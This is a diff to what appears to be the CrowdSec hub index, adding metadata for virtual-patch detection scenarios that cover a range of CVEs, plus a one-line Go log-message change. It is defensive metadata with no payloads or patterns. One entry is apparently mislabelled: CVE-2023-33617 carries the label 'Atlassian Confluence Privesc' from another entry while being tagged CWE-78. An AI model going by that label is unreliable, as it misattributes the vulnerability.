+    "name": "crowdsecurity/vpatch-CVE-2019-12989",
+    "description": "Detect CVE-2019-12989 exploits ",
+    "label": "citrix SQLi (CVE-2019-12989)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2019-12989"
+    ],
+    "cwes": [
+      "CWE-89"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2020-11738": {
+    "name": "crowdsecurity/vpatch-CVE-2020-11738",
+    "description": "Detect CVE-2020-11738 exploits ",
+    "label": "Wordpress Snap Creek Duplicator (CVE-2020-11738)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2020-11738"
+    ],
+    "cwes": [
+      "CWE-22"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2021-22941": {
+    "name": "crowdsecurity/vpatch-CVE-2021-22941",
+    "description": "Detect CVE-2021-22941 exploits ",
+    "label": "Citrix RCE (CVE-2021-22941)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2021-22941"
+    ],
+    "cwes": [
+      "CWE-284"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2021-3129": {
+    "name": "crowdsecurity/vpatch-CVE-2021-3129",
+    "description": "Detect CVE-2021-3129 exploits ",
+    "label": "Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution (CVE-2021-3129)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2021-3129"
+    ],
+    "cwes": [
+      "CWE-98"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2022-27926": {
+    "name": "crowdsecurity/vpatch-CVE-2022-27926",
+    "description": "Detect CVE-2022-27926 exploits ",
+    "label": "Zimbra Collaboration (ZCS) - Cross Site Scripting (CVE-2022-27926)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2022-27926"
+    ],
+    "cwes": [
+      "CWE-79"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2022-35914": {
+    "name": "crowdsecurity/vpatch-CVE-2022-35914",
+    "description": "Detect CVE-2022-35914 exploits ",
+    "label": "GLPI <=10.0.2 - Remote Command Execution (CVE-2022-35914)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2022-35914"
+    ],
+    "cwes": [
+      "CWE-74"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2022-44877": {
+    "name": "crowdsecurity/vpatch-CVE-2022-44877",
+    "description": "Detect CVE-2022-44877 exploits ",
+    "label": "CentOS Web Panel 7 RCE (CVE-2022-44877)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2022-44877"
+    ],
+    "cwes": [
+      "CWE-78"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2022-46169": {
+    "name": "crowdsecurity/vpatch-CVE-2022-46169",
+    "description": "Detect CVE-2022-46169 exploits ",
+    "label": "Cacti <=1.2.22 - Remote Command Injection (CVE-2022-46169)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2022-46169"
+    ],
+    "cwes": [
+      "CWE-74",
+      "CWE-77",
+      "CWE-78",
+      "CWE-863"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2023-20198": {
+    "name": "crowdsecurity/vpatch-CVE-2023-20198",
+    "description": "Detect CVE-2023-20198 exploits ",
+    "label": "CISCO IOS XE account creation (CVE-2023-20198)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2023-20198"
+    ],
+    "cwes": [
+      "CWE-287"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2023-22515": {
+    "name": "crowdsecurity/vpatch-CVE-2023-22515",
+    "description": "Detect CVE-2023-22515 exploits ",
+    "label": "Atlassian Confluence Privesc (CVE-2023-22515)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2023-22515"
+    ],
+    "cwes": [
+      "CWE-284"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2023-24489": {
+    "name": "crowdsecurity/vpatch-CVE-2023-24489",
+    "description": "Detect CVE-2023-24489 exploits ",
+    "label": "Citrix ShareFile RCE (CVE-2023-24489)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2023-24489"
+    ],
+    "cwes": [
+      "CWE-284"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2023-33617": {
+    "name": "crowdsecurity/vpatch-CVE-2023-33617",
+    "description": "Detect CVE-2023-33617 exploits ",
+    "label": "Atlassian Confluence Privesc (CVE-2023-33617)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2023-33617"
+    ],
+    "cwes": [
+      "CWE-78"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2023-34362": {
+    "name": "crowdsecurity/vpatch-CVE-2023-34362",
+    "description": "Detect CVE-2023-34362 exploits ",
+    "label": "MOVEit Transfer - Remote Code Execution (CVE-2023-34362)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2023-34362"
+    ],
+    "cwes": [
+      "CWE-89"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2023-3519": {
+    "name": "crowdsecurity/vpatch-CVE-2023-3519",
+    "description": "Detect CVE-2023-3519 exploits ",
+    "label": "Citrix RCE (CVE-2023-3519)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2023-3519"
+    ],
+    "cwes": [
+      "CWE-94"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2023-38205": {
+    "name": "crowdsecurity/vpatch-CVE-2023-38205",
+    "description": "Detect CVE-2023-38205 exploits ",
+    "label": "Adobe ColdFusion access control bypass (CVE-2023-38205)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2023-38205"
+    ],
+    "cwes": [
+      "CWE-284"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2023-40044": {
+    "name": "crowdsecurity/vpatch-CVE-2023-40044",
+    "description": "Detect CVE-2023-40044 exploits ",
+    "label": "WS_FTP .NET deserialize RCE (CVE-2023-40044)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2023-40044"
+    ],
+    "cwes": [
+      "CWE-502"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2023-42793": {
+    "name": "crowdsecurity/vpatch-CVE-2023-42793",
+    "description": "Detect CVE-2023-42793",
+    "label": "JetBrains Teamcity auth bypass (CVE-2023-42793)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2023-42793"
+    ],
+    "cwes": [
+      "CWE-288"
+    ]
+  },
+  "crowdsecurity/vpatch-CVE-2023-50164": {
+    "name": "crowdsecurity/vpatch-CVE-2023-50164",
+    "description": "Detect CVE-2023-50164 exploits ",
+    "label": "Apache Struts2 (CVE-2023-50164)",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http",
+    "cves": [
+      "CVE-2023-50164"
+    ],
+    "cwes": [
+      "CWE-552"
+    ]
+  },
+  "crowdsecurity/vpatch-env-access": {
+    "name": "crowdsecurity/vpatch-env-access",
+    "description": "Detect access to .env files",
+    "label": "Access to .env file",
+    "behaviors": [
+      "http:scan"
+    ],
+    "mitre_attacks": [
+      "TA0043:T1595",
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http"
+  },
   "Dominic-Wagner/vaultwarden-bf": {
     "name": "Dominic-Wagner/vaultwarden-bf",
     "description": "Detect vaultwarden bruteforce",
@@ -927,6 +1364,21 @@
       "CVE-2021-44228"
     ]
   },
+  "crowdsecurity/appsec-vpatch": {
+    "name": "crowdsecurity/appsec-vpatch",
+    "description": "Detect appsec attacks",
+    "label": "appsec blocked",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0006:T1110"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http"
+  },
   "crowdsecurity/asterisk_bf": {
     "name": "crowdsecurity/asterisk_bf",
     "description": "Detect asterisk user bruteforce",
@@ -1337,6 +1789,32 @@
     "cti": true,
     "service": "cpanel"
   },
+  "crowdsecurity/crowdsec-appsec-inband": {
+    "name": "crowdsecurity/crowdsec-appsec-inband",
+    "description": "IP has triggered multiples In Band CrowdSec appsec rules",
+    "label": "Triggered multiple inband CrowdSec appsec rules",
+    "behaviors": [
+      "http:exploit"
+    ],
+    "mitre_attacks": [
+      "TA0001:T1190"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "http"
+  },
+  "crowdsecurity/crowdsec-appsec-outofband": {
+    "name": "crowdsecurity/crowdsec-appsec-outofband",
+    "description": "IP has triggered more than 5 CrowdSec Out Of Band Waap rules",
+    "label": "IP HAS Triggered More Than 5 Crowdsec OUT OF Band Waap Rules",
+    "behaviors": [],
+    "mitre_attacks": [],
+    "confidence": 0,
+    "spoofable": 0,
+    "cti": true,
+    "service": null
+  },
   "crowdsecurity/dovecot-spam": {
     "name": "crowdsecurity/dovecot-spam",
     "description": "detect errors on dovecot",
@@ -1959,6 +2437,32 @@
     "cti": true,
     "service": "http"
   },
+  "crowdsecurity/impossible-travel-user": {
+    "name": "crowdsecurity/impossible-travel-user",
+    "description": "impossible travel user",
+    "label": "Impossible travel",
+    "behaviors": [],
+    "mitre_attacks": [
+      "TA0003:T1078"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "authentication"
+  },
+  "crowdsecurity/impossible-travel": {
+    "name": "crowdsecurity/impossible-travel",
+    "description": "impossible travel",
+    "label": "Impossible travel",
+    "behaviors": [],
+    "mitre_attacks": [
+      "TA0003:T1078"
+    ],
+    "confidence": 3,
+    "spoofable": 0,
+    "cti": true,
+    "service": "authentication"
+  },
   "crowdsecurity/iptables-scan-multi_ports": {
     "name": "crowdsecurity/iptables-scan-multi_ports",
     "description": "ban IPs that are scanning us",
diff --git a/update.go b/update.go
index 542258f59f1..75599d676be 100644
--- a/update.go
+++ b/update.go
@@ -62,7 +62,7 @@ func updateIndex(configType string, idx map[string]map[string]typeInfo, tmpIdx m
 					var tInfo typeInfo
 					hubName, err := tInfo.generate(filepath, configType)
 					if err != nil {
-						fmt.Printf("skipping '%s' because : %s\n", filepath, err.Error())
+						fmt.Printf("skipping '%s' for update because : %s\n", filepath, err.Error())
 					} else {
 						idx[configType][hubName] = tInfo
 					}